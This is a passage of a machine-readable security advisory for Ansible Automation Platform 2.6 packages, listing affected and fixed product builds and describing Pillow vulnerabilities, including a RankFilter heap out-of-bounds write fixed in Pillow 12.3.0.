"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file"
},
{
"cve": "CVE-2026-59197",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-07-14T17:01:29.487456+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500043"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Native heap out-of-bounds write",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Pillow\u0027s RankFilter API is vulnerable to a native heap out-of-bounds write when a caller supplies a very large odd filter size. Expansion runs before size validation and ImagingExpand uses unchecked signed integer arithmetic for output dimensions. A remote attacker who can drive RankFilter with attacker-controlled sizes may crash the process or corrupt heap memory. Fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
